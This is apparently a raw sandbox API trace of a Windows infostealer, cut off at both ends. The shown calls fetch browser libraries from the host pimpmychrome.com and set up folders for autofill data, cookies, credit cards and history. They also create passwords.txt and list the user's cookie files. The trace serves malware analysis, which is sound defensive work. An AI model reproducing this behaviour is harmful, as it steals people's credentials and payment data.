lpBuffer=0x5271058, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5271058*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.513] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5271440, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5271440*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.513] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5271828, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5271828*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.513] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5271c10, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5271c10*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.514] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5271ff8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5271ff8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.514] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x52723e0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x52723e0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.514] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x52727c8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x52727c8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.514] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5272bb0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5272bb0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.514] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5272f98, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5272f98*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.514] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5273380, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5273380*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.515] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5273768, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5273768*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.515] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5273b50, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5273b50*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.515] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5273f38, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5273f38*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.515] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5274320, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5274320*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.516] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5274708, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5274708*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.516] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5274af0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5274af0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.516] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5274ed8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5274ed8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.517] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x52752c0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x52752c0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.517] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x52756a8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x52756a8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.517] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5275a90, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5275a90*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.517] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x43800) returned 0x7ce0048 [0127.518] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x523a170 | out: hHeap=0x6c90000) returned 1 [0127.518] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x7d1bd50, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x7d1bd50*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.519] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x7d1c138, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x7d1c138*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.519] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x7d1c520, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x7d1c520*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.519] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x7d1c908, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x7d1c908*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.582] InternetOpenA (lpszAgent="", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0127.583] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x41, lpBuffer=0x18d94c, dwBufferLength=0x4) returned 1 [0127.583] InternetConnectA (hInternet=0xcc0004, lpszServerName="pimpmychrome.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008 [0127.583] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/mozglue.dll", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x400000, dwContext=0x1) returned 0xcc000c [0127.583] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x80) returned 0x6c91368 [0127.583] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1", dwHeadersLength=0x7d, dwModifiers=0x20000000) returned 1 [0127.583] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Language: ru-RU,ru;q=0.9,en;q=0.8", dwHeadersLength=0x28, dwModifiers=0x20000000) returned 1 [0127.583] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1", dwHeadersLength=0x32, dwModifiers=0x20000000) returned 1 [0127.583] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0", dwHeadersLength=0x37, dwModifiers=0x20000000) returned 1 [0127.584] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c91368 | out: hHeap=0x6c90000) returned 1 [0127.584] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0127.640] InternetSetFilePointer (in: hFile=0xcc000c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0, dwContext=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.321] InternetOpenA (lpszAgent="", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0128.321] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x41, lpBuffer=0x18d94c, dwBufferLength=0x4) returned 1 [0128.322] InternetConnectA (hInternet=0xcc0004, lpszServerName="pimpmychrome.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008 [0128.322] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/msvcp140.dll", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x400000, dwContext=0x1) returned 0xcc000c [0128.322] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x80) returned 0x6c91368 [0128.322] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1", dwHeadersLength=0x7d, dwModifiers=0x20000000) returned 1 [0128.322] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Language: ru-RU,ru;q=0.9,en;q=0.8", dwHeadersLength=0x28, dwModifiers=0x20000000) returned 1 [0128.322] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1", dwHeadersLength=0x32, dwModifiers=0x20000000) returned 1 [0128.322] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0", dwHeadersLength=0x37, dwModifiers=0x20000000) returned 1 [0128.322] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c91368 | out: hHeap=0x6c90000) returned 1 [0128.322] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0132.097] InternetSetFilePointer (in: hFile=0xcc000c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0, dwContext=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.957] InternetOpenA (lpszAgent="", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0132.958] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x41, lpBuffer=0x18d94c, dwBufferLength=0x4) returned 1 [0132.958] InternetConnectA (hInternet=0xcc0004, lpszServerName="pimpmychrome.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008 [0132.958] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/nss3.dll", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x400000, dwContext=0x1) returned 0xcc000c [0132.959] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x80) returned 0x6c91368 [0132.959] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1", dwHeadersLength=0x7d, dwModifiers=0x20000000) returned 1 [0132.959] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Language: ru-RU,ru;q=0.9,en;q=0.8", dwHeadersLength=0x28, dwModifiers=0x20000000) returned 1 [0132.959] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1", dwHeadersLength=0x32, dwModifiers=0x20000000) returned 1 [0132.959] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0", dwHeadersLength=0x37, dwModifiers=0x20000000) returned 1 [0132.959] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c91368 | out: hHeap=0x6c90000) returned 1 [0132.959] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0133.086] InternetSetFilePointer (in: hFile=0xcc000c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0, dwContext=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.620] InternetOpenA (lpszAgent="", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0135.620] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x41, lpBuffer=0x18d94c, dwBufferLength=0x4) returned 1 [0135.620] InternetConnectA (hInternet=0xcc0004, lpszServerName="pimpmychrome.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008 [0135.620] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/softokn3.dll", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x400000, dwContext=0x1) returned 0xcc000c [0135.620] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x80) returned 0x6c91368 [0135.620] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1", dwHeadersLength=0x7d, dwModifiers=0x20000000) returned 1 [0135.620] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Language: ru-RU,ru;q=0.9,en;q=0.8", dwHeadersLength=0x28, dwModifiers=0x20000000) returned 1 [0135.620] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1", dwHeadersLength=0x32, dwModifiers=0x20000000) returned 1 [0135.620] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0", dwHeadersLength=0x37, dwModifiers=0x20000000) returned 1 [0135.620] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c91368 | out: hHeap=0x6c90000) returned 1 [0135.620] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0135.680] InternetSetFilePointer (in: hFile=0xcc000c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0, dwContext=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.800] InternetOpenA (lpszAgent="", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0135.800] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x41, lpBuffer=0x18d94c, dwBufferLength=0x4) returned 1 [0135.800] InternetConnectA (hInternet=0xcc0004, lpszServerName="pimpmychrome.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008 [0135.800] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/vcruntime140.dll", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x400000, dwContext=0x1) returned 0xcc000c [0135.801] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x80) returned 0x6c91388 [0135.801] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1", dwHeadersLength=0x7d, dwModifiers=0x20000000) returned 1 [0135.801] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Language: ru-RU,ru;q=0.9,en;q=0.8", dwHeadersLength=0x28, dwModifiers=0x20000000) returned 1 [0135.801] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1", dwHeadersLength=0x32, dwModifiers=0x20000000) returned 1 [0135.801] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0", dwHeadersLength=0x37, dwModifiers=0x20000000) returned 1 [0135.801] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c91388 | out: hHeap=0x6c90000) returned 1 [0135.801] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0135.854] InternetSetFilePointer (in: hFile=0xcc000c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0, dwContext=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.146] CreateDirectoryA (lpPathName="C:\\ProgramData\\4ZIDRNX9MN20P9GN70EIPOHE8\\files\\Autofill" (normalized: "c:\\programdata\\4zidrnx9mn20p9gn70eipohe8\\files\\autofill"), lpSecurityAttributes=0x0) returned 1 [0136.147] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c912f0 | out: hHeap=0x6c90000) returned 1 [0136.147] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x40) returned 0x6c912f0 [0136.147] CreateDirectoryA (lpPathName="C:\\ProgramData\\4ZIDRNX9MN20P9GN70EIPOHE8\\files\\Cookies" (normalized: "c:\\programdata\\4zidrnx9mn20p9gn70eipohe8\\files\\cookies"), lpSecurityAttributes=0x0) returned 1 [0136.147] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c912f0 | out: hHeap=0x6c90000) returned 1 [0136.147] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x40) returned 0x6c912f0 [0136.148] CreateDirectoryA (lpPathName="C:\\ProgramData\\4ZIDRNX9MN20P9GN70EIPOHE8\\files\\CC" (normalized: "c:\\programdata\\4zidrnx9mn20p9gn70eipohe8\\files\\cc"), lpSecurityAttributes=0x0) returned 1 [0136.148] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c912f0 | out: hHeap=0x6c90000) returned 1 [0136.148] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x40) returned 0x6c912f0 [0136.149] CreateDirectoryA (lpPathName="C:\\ProgramData\\4ZIDRNX9MN20P9GN70EIPOHE8\\files\\History" (normalized: "c:\\programdata\\4zidrnx9mn20p9gn70eipohe8\\files\\history"), lpSecurityAttributes=0x0) returned 1 [0136.149] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c912f0 | out: hHeap=0x6c90000) returned 1 [0136.149] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x40) returned 0x6c912f0 [0136.149] CreateDirectoryA (lpPathName="C:\\ProgramData\\4ZIDRNX9MN20P9GN70EIPOHE8\\files\\Downloads" (normalized: "c:\\programdata\\4zidrnx9mn20p9gn70eipohe8\\files\\downloads"), lpSecurityAttributes=0x0) returned 1 [0136.149] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c912f0 | out: hHeap=0x6c90000) returned 1 [0136.149] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x30) returned 0x6c912f0 [0136.149] SetCurrentDirectoryA (lpPathName="C:\\ProgramData\\4ZIDRNX9MN20P9GN70EIPOHE8\\files\\" (normalized: "c:\\programdata\\4zidrnx9mn20p9gn70eipohe8\\files")) returned 1 [0136.150] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c912f0 | out: hHeap=0x6c90000) returned 1 [0136.150] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x30) returned 0x6c912f0 [0136.150] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x30) returned 0x6c91328 [0136.150] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c912f0 | out: hHeap=0x6c90000) returned 1 [0136.150] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x18) returned 0x6c912f0 [0136.150] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x18) returned 0x6c91360 [0136.150] CreateFileA (lpFileName="passwords.txt" (normalized: "c:\\programdata\\4zidrnx9mn20p9gn70eipohe8\\files\\passwords.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x18d7f4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa8 [0136.152] GetFileType (hFile=0xa8) returned 0x1 [0136.152] CloseHandle (hObject=0xa8) returned 1 [0136.153] GetLastError () returned 0x0 [0136.153] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\*.txt", lpFindFileData=0x18d37c | out: lpFindFileData=0x18d37c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x44eb6480, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x44eb6480, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x44eb6480, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x6c915c8, dwReserved1=0x6c90000, cFileName="5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt", cAlternateFileName="5P9943~1.TXT")) returned 0x5380a08 [0136.157] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce0048 | out: hHeap=0x6c90000) returned 1 [0136.157] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x70) returned 0x6c91638 [0136.158] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x1c) returned 0x6c916b0 [0136.158] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x70) returned 0x6c916d8 [0136.158] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c91638 | out: hHeap=0x6c90000) returned 1 [0136.158] FindNextFileW (in: hFindFile=0x5380a08, lpFindFileData=0x18d37c | out: lpFindFileData=0x18d37c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x44bd95f0, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x44bd95f0, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x44bd95f0, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x6c915c8, dwReserved1=0x6c90000, cFileName="5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt", cAlternateFileName="5P37D9~1.TXT")) returned 1 [0136.158] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x60) returned 0x6c91638 [0136.158] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x38) returned 0x7ce0048 [0136.158] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c916b0 | out: hHeap=0x6c90000) returned 1 [0136.158] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x60) returned 0x7ce0088 [0136.158] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c91638 | out: hHeap=0x6c90000) returned 1 [0136.158] FindNextFileW (in: hFindFile=0x5380a08, lpFindFileData=0x18d37c | out: lpFindFileData=0x18d37c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf73d210, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf73d210, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf73d210, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x5d, dwReserved0=0x6c915c8, dwReserved1=0x6c90000, cFileName="5p5nrgjn0js_halpmcxz@adformdsp[1].txt", cAlternateFileName="5P2CBA~1.TXT")) returned 1 [0136.158] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x6c91638 [0136.159] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x54) returned 0x7ce00f0 [0136.159] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce0048 | out: hHeap=0x6c90000) returned 1 [0136.159] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x7ce0150 [0136.159] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c91638 | out: hHeap=0x6c90000) returned 1 [0136.159] FindNextFileW (in: hFindFile=0x5380a08, lpFindFileData=0x18d37c | out: lpFindFileData=0x18d37c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf2a0770, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf7d5790, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf7d5790, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0xea, dwReserved0=0x6c915c8, dwReserved1=0x6c90000, cFileName="5p5nrgjn0js_halpmcxz@adform[1].txt", cAlternateFileName="5P8600~1.TXT")) returned 1 [0136.159] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x6c91638 [0136.159] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x70) returned 0x7ce01a8 [0136.159] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce00f0 | out: hHeap=0x6c90000) returned 1 [0136.159] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x7ce00f0 [0136.159] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c91638 | out: hHeap=0x6c90000) returned 1 [0136.159] FindNextFileW (in: hFindFile=0x5380a08, lpFindFileData=0x18d37c | out: lpFindFileData=0x18d37c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbe5d5130, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0x45f08810, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x45f08810, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x242, dwReserved0=0x6c915c8, dwReserved1=0x6c90000, cFileName="5p5nrgjn0js_halpmcxz@adnxs[1].txt", cAlternateFileName="5P89EF~1.TXT")) returned 1 [0136.159] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x6c91638 [0136.159] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0xa8) returned 0x7ce0220 [0136.159] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce01a8 | out: hHeap=0x6c90000) returned 1 [0136.159] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x7ce01a8 [0136.159] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c91638 | out: hHeap=0x6c90000) returned 1 [0136.159] FindNextFileW (in: hFindFile=0x5380a08, lpFindFileData=0x18d37c | out: lpFindFileData=0x18d37c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x52fcb4b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52fcb4b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52fcb4b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x65, dwReserved0=0x6c915c8, dwReserved1=0x6c90000, cFileName="5p5nrgjn0js_halpmcxz@adtech[2].txt", cAlternateFileName="5PC5B2~1.TXT")) returned 1 [0136.159] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x6c91638 [0136.159] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x7ce02d0 [0136.159] HeapFree (in: hHeap=0x6c90000, 